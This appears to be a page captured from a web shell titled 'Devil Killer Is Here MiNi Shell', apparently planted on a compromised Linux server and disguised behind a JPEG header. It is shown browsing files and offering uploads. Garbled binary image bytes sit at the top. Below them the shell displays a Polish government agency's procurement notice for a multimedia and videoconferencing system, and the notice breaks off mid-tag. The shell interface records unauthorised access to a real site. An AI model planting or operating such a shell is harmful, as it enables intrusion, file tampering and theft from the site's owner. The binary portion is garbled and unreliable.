JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240220/0021161901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup zintegrowanego systemu multimedialnego i wideokonferencyjnego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rządowa Agencja Rezerw Strategicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 012199305</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grzybowska 45</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-844</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 223609153</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@rars.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rars.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> rezerwy strategiczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup zintegrowanego systemu multimedialnego i wideokonferencyjnego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-67f97e2b-cfdd-11ee-875e-a22221c84ba7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00211619</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00116066/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Zintegrowany system multimedialny i telekonferencjny</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rars <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/rars</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim.<br/>2. Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie <br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż <br/>oferta Wykonawcy), odbywa się przy użyciu środków komunikacji elektronicznej, <br/>tj. za pośrednictwem Platformy zakupowej zwanej dalej „Platformą” pod <br/>adresem: https://platformazakupowa.pl/pn/rars<br/>3. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie <br/>zamówienia publicznego, nie musi posiadać konta na Platformie. Korzystanie <br/>z Platformy przez Wykonawcę jest bezpłatne.<br/>4. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania <br/>korespondencji elektronicznej, zostały opisane w Regulaminie Internetowej <br/>Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o.o., zwany dalej <br/>Regulaminem na Platformie. Sposób sporządzenia, wysyłania i odbierania <br/>korespondencji elektronicznej musi być zgodny z wymaganiami określonymi w <br/>rozporządzeniu wydanym na podstawie art. 70 Ustawy Pzp.<br/>5. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia, <br/>akceptuje warunki korzystania z Platformy określone w Regulaminie oraz <br/>zobowiązuje się, korzystając z Platformy, przestrzegać postanowień Regulaminu.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 <br/>MB.<br/>7. Za datę:<br/>1) przekazania oferty przyjmuje się datę jej przekazania w systemie Platformy <br/>poprzez kliknięcie przycisku Złóż ofertę w drugim kroku i wyświetlaniu <br/>komunikatu, że oferta została złożona. <br/>2) przekazania zawiadomień, dokumentów lub oświadczeń elektronicznych, <br/>podmiotowych środków dowodowych lub cyfrowego odwzorowania <br/>podmiotowych środków dowodowych oraz innych informacji sporządzonych <br/>pierwotnie w postaci papierowej, przyjmuje się datę kliknięcia przycisku Wyślij <br/>wiadomość po których pojawi się komunikat, że wiadomość została wysłana do <br/>Zamawiającego.<br/>8. Wykonawca może zwrócić się do Zamawiającego za pośrednictwem Platformy <br/>z wnioskiem o wyjaśnienie treści SWZ. Zamawiający udzieli wyjaśnień niezwłocznie, <br/>jednak nie później niż na 2 dni przed upływem terminu składania ofert (udostępniając <br/>je na stronie internetowej prowadzonego postępowania (Platformie), pod warunkiem,<br/>że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na <br/>4 dni przed upływem terminu składania ofert. W przypadku gdy wniosek o wyjaśnienie <br/>treści SWZ nie wpłynie w terminie, Zamawiający nie ma obowiązku udzielania <br/>wyjaśnień SWZ oraz przedłużenia terminu składania ofert. Przedłużenie terminu <br/>składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści <br/>SWZ.<br/>9. Zamawiający prosi o przekazywanie pytań również w formie edytowalnej, gdyż skróci <br/>to czas udzielania wyjaśnień.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z <br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych <br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. <br/>UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Rządowa Agencja Rezerw <br/>Strategicznych z siedzibą w Warszawie (00-844), ul. Grzybowska 45, <br/>tel. +48 22 36 09 100, adres e-mail: kancelaria@rars.gov.pl;<br/>2) administrator wyznaczył Inspektora Ochrony Danych, z którym można się <br/>skontaktować poprzez e-mail: iod@rars.gov.pl, lub tel. +48 22 36 09 237;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia <br/>publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą:<br/>a) osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania <br/>w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo <br/>zamówień publicznych;<br/>b) osoby lub podmioty, którym administrator udzieli informacji publicznej zgodnie <br/>z ustawą z dnia 6 września 2001 r. o dostępie do informacji publicznej <br/>(Dz.U. z 2020 r. poz. 2176);<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, <br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli <br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas <br/>trwania umowy, a po ich wykorzystaniu przetwarzane będą dla celów archiwalnych <br/>na podstawie ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym <br/>i archiwach (Dz.U. z 2020 r. poz. 164);<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, <br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>konsekwencje niepodania określonych danych wynikają z ustawy;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana <br/>dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana <br/>danych osobowych przy czym skorzystanie z prawa do sprostowania lub <br/>uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie <br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie <br/>niezgodnym <br/>z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego <br/>załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma <br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia <br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby <br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii <br/>Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania <br/>danych osobowych do czasu zakończenia postępowania o udzielenie <br/>zamówienia;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących <br/>narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych <br/>osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych <br/>osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku <br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane <br/>przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które <br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba <br/>że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZzp 271.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 657020,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Zakup, montaż i konfiguracja systemu multimedialnego i <br/>wideokonferencyjnego w podziale na Zadania i Etapy:<br/>1) Zadanie 1: zakup, montaż i konfiguracja systemu multimedialnego:<br/>• Etap I: w Nowej Siedzibie RARS w Warszawie;<br/>• Etap II: w Ośrodku RARS w Konstancinie-Jeziornie;<br/>• Etap III: demontaż Systemów z Centrali RARS (ul. Grzybowska 45, Warszawa),<br/>a następnie transport, montaż i konfiguracja w Ośrodku RARS w Konstancinie- Jeziornej.<br/><br/><br/>Miejscem wykonania zamówienia dla obydwu zadań jest miejsce na terenie kraju (Polska), <br/>a dokładny opis zawiera załącznik nr. 1 do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 265920,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32232000-8 - Sprzęt wideokonferencyjny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria, którymi Zamawiający będzie kierował się przy wyborze oferty wraz z <br/>podaniem znaczenia (wag) tych kryteriów:<br/>1. Cena (C) - 60 %<br/>2. Termin realizacji zamówienia (T) – 20%<br/>3. Okres gwarancji (G)– 20%<br/>2. Ocena ofert:<br/>1) Opis kryterium „Cena (C)”:<br/>Ocena w niniejszym kryterium zostanie dokonana według następującego wzoru:<br/> <br/>C =Najniższa cena brutto przedstawiona w ofertach na realizację zamówienia/ Cena brutto na realizację zamówienia badanej oferty x 60<br/> <br/>2) Opis kryterium „Termin realizacji zamówienia (T)”<br/>Termin realizacji Punkty <br/><br/>od 35 do 45 dni od daty <br/>podpisania umowy - 10 pkt<br/><br/>od 21 do 34 od daty <br/>podpisania umowy - 15 pkt<br/><br/>do 20 dni od daty <br/>podpisania umowy - 20 pkt <br/>Uwaga – jeżeli wykonawca nie poda ilość dni, obowiązuje maksymalny okres, a wykonawca <br/>otrzyma 0 pkt. Jeżeli wykonawca zaoferuje okres dłuższy niż maksymalny, oferta podlega <br/>odrzuceniu.<br/><br/>3) Opis kryterium „Okres gwarancji (G)” – dotyczy systemów:<br/>Długość gwarancji na <br/>systemy Punkty <br/>24 m-ce – 29 m-ce - 10 pkt<br/>30 m-cy lub więcej - 20 pkt<br/>Uwaga - Zamawiający wskazuje, że minimalny okres gwarancji to 24 miesiące. Brak podania w ofercie ilości miesięcy skutkuje uznaniem, że obowiązuje okres 24 miesięcy, za co wykonawca otrzyma 0 pkt. Jeśli wykonawca zaoferuje krótszy okres, oferta podlega odrzuceniu.<br/><br/>3. Łączna ocena ofert zostanie obliczona wg wzoru: Suma = C+T+G<br/>4. Łączna maksymalna liczba punktów, jaką można przyznać ofercie za wszystkie kryteria <br/>wynosi 100 pkt. Przyjmuje się, że 1 pkt równa się 1%. Punktacja przyznawana ofertom<br/>w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Zakup, montaż i konfiguracja systemu multimedialnego i <br/>wideokonferencyjnego w podziale na Zadania i Etapy:<br/>Zadanie 2: zakup, montaż i konfiguracja systemu wideokonferencyjnego wraz z <br/>zakupem 250 szt. subskrypcji usług dla platformy do współpracy wideokonferencyjnej:<br/>• Etap I: w Nowej Siedzibie RARS w Warszawie; <br/>• Etap II: w Ośrodku RARS w Konstancinie-Jeziornej.<br/><br/>Miejscem wykonania zamówienia dla obydwu zadań jest miejsce na terenie kraju (Polska), <br/>a dokładny opis zawiera załącznik nr. 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 391100,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32232000-8 - Sprzęt wideokonferencyjny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria, którymi Zamawiający będzie kierował się przy wyborze oferty wraz z <br/>podaniem znaczenia (wag) tych kryteriów:<br/>1. Cena (C) - 60 %<br/>2. Termin realizacji zamówienia (T) – 20%<br/>3. Okres gwarancji (G)– 20%<br/>2. Ocena ofert:<br/>1) Opis kryterium „Cena (C)”:<br/>Ocena w niniejszym kryterium zostanie dokonana według następującego wzoru:<br/> <br/>C =Najniższa cena brutto przedstawiona w ofertach na realizację zamówienia/ Cena brutto na realizację zamówienia badanej oferty x 60<br/> <br/>2) Opis kryterium „Termin realizacji zamówienia (T)”<br/>Termin realizacji Punkty <br/><br/>od 35 do 45 dni od daty <br/>podpisania umowy - 10 pkt<br/><br/>od 21 do 34 od daty <br/>podpisania umowy - 15 pkt<br/><br/>do 20 dni od daty <br/>podpisania umowy - 20 pkt <br/>Uwaga – jeżeli wykonawca nie poda ilość dni, obowiązuje maksymalny okres, a wykonawca <br/>otrzyma 0 pkt. Jeżeli wykonawca zaoferuje okres dłuższy niż maksymalny, oferta podlega <br/>odrzuceniu.<br/><br/>3) Opis kryterium „Okres gwarancji (G)” – dotyczy systemów:<br/>Długość gwarancji na <br/>systemy Punkty <br/>24 m-ce – 29 m-ce - 10 pkt<br/>30 m-cy lub więcej - 20 pkt<br/>Uwaga - Zamawiający wskazuje, że minimalny okres gwarancji to 24 miesiące. Brak podania w ofercie ilości miesięcy skutkuje uznaniem, że obowiązuje okres 24 miesięcy, za co wykonawca otrzyma 0 pkt. Jeśli wykonawca zaoferuje krótszy okres, oferta podlega odrzuceniu.<br/><br/>3. Łączna ocena ofert zostanie obliczona wg wzoru: Suma = C+T+G<br/>4. Łączna maksymalna liczba punktów, jaką można przyznać ofercie za wszystkie kryteria <br/>wynosi 100 pkt. Przyjmuje się, że 1 pkt równa się 1%. Punktacja przyznawana ofertom<br/>w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 